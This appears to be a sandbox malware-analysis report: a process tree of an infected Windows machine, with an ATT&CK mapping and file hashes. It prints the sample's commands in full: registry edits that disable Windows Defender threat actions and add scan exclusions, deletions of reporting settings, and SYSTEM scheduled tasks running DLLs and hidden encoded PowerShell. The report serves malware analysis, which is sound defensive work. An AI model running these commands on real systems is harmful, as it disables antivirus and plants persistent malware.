C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6772 -ip 67721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2324 -ip 23241⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2324 -ip 23241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2324 -ip 23241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1604 -ip 16041⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 656 -p 1016 -ip 10161⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1016 -s 37521⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2508 -ip 25081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 756 -ip 7561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4036 -ip 40361⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\ZGyBjbVKBwBPExFHM\oucUKIuPjfZayxv\pAsgXvX.exeC:\Users\Admin\AppData\Local\Temp\ZGyBjbVKBwBPExFHM\oucUKIuPjfZayxv\pAsgXvX.exe Gd /site_id 525403 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FhyoaPDMnMVPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FhyoaPDMnMVPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ThzVCJnTCjoHbqPVlfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ThzVCJnTCjoHbqPVlfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\axMMTydwU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\axMMTydwU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hpTREZfukwYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hpTREZfukwYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sWmVSvfFYDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sWmVSvfFYDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HZacXkUvgCsXIQVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HZacXkUvgCsXIQVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZGyBjbVKBwBPExFHM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZGyBjbVKBwBPExFHM\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wbnOffpVInETIpDZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wbnOffpVInETIpDZ\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FhyoaPDMnMVPC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FhyoaPDMnMVPC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FhyoaPDMnMVPC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ThzVCJnTCjoHbqPVlfR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ThzVCJnTCjoHbqPVlfR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\axMMTydwU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\axMMTydwU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hpTREZfukwYU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hpTREZfukwYU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sWmVSvfFYDUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sWmVSvfFYDUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HZacXkUvgCsXIQVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HZacXkUvgCsXIQVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZGyBjbVKBwBPExFHM /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZGyBjbVKBwBPExFHM /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wbnOffpVInETIpDZ /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wbnOffpVInETIpDZ /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsqbcDSuo" /SC once /ST 05:06:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsqbcDSuo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsqbcDSuo"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WMulpZkUHspjwpGRl" /SC once /ST 00:08:30 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wbnOffpVInETIpDZ\htcOjdXcESktaKp\vDmLWVc.exe\" E7 /site_id 525403 /S" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WMulpZkUHspjwpGRl"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\Temp\wbnOffpVInETIpDZ\htcOjdXcESktaKp\vDmLWVc.exeC:\Windows\Temp\wbnOffpVInETIpDZ\htcOjdXcESktaKp\vDmLWVc.exe E7 /site_id 525403 /S1⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "byKByeoBcBZIhKbqIQ"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\axMMTydwU\SAXCEY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "aWFGqYxXHxatLEE" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aWFGqYxXHxatLEE2" /F /xml "C:\Program Files (x86)\axMMTydwU\vJOiSMd.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "aWFGqYxXHxatLEE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aWFGqYxXHxatLEE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iocjmCkNWnIFVr" /F /xml "C:\Program Files (x86)\hpTREZfukwYU2\SxwBPEB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BTJPnUfLbPJam2" /F /xml "C:\ProgramData\HZacXkUvgCsXIQVB\VxcxVXV.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VzhjmTvQvMcqvIjRk2" /F /xml "C:\Program Files (x86)\ThzVCJnTCjoHbqPVlfR\oyQMeNm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rGKcirBCTxFSdaivZBG2" /F /xml "C:\Program Files (x86)\FhyoaPDMnMVPC\KoHRjOH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "umHoEHxeZlKBdStup" /SC once /ST 03:12:30 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wbnOffpVInETIpDZ\eGeyVkeU\lgzbykb.dll\",#1 /site_id 525403" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "umHoEHxeZlKBdStup"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "klrOd1" /SC once /ST 00:48:51 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "klrOd1"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "klrOd1"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WMulpZkUHspjwpGRl"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1604 -ip 16041⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wbnOffpVInETIpDZ\eGeyVkeU\lgzbykb.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\wbnOffpVInETIpDZ\eGeyVkeU\lgzbykb.dll",#1 /site_id 5254032⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "umHoEHxeZlKBdStup"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1604 -ip 16041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1604 -ip 16041⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbc2d64f50,0x7ffbc2d64f60,0x7ffbc2d64f702⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1604 -ip 16041⤵
-
C:\Users\Admin\AppData\Roaming\gafggusC:\Users\Admin\AppData\Roaming\gafggus1⤵
-
C:\Users\Admin\AppData\Roaming\ajfggusC:\Users\Admin\AppData\Roaming\ajfggus1⤵
-
C:\Users\Admin\AppData\Roaming\cafggusC:\Users\Admin\AppData\Roaming\cafggus1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Bootkit
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1File Permissions Modification
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\51Qbm.RFFilesize
802KB
MD53a18ee61a6e9823973de6a5948f4468c
SHA19e0e0f14565f87a6075dbb879a4c88b665c72eae
SHA2561337a360f9a673dae91b6e44f2795be41b83641096f77439f65d810001bb3892
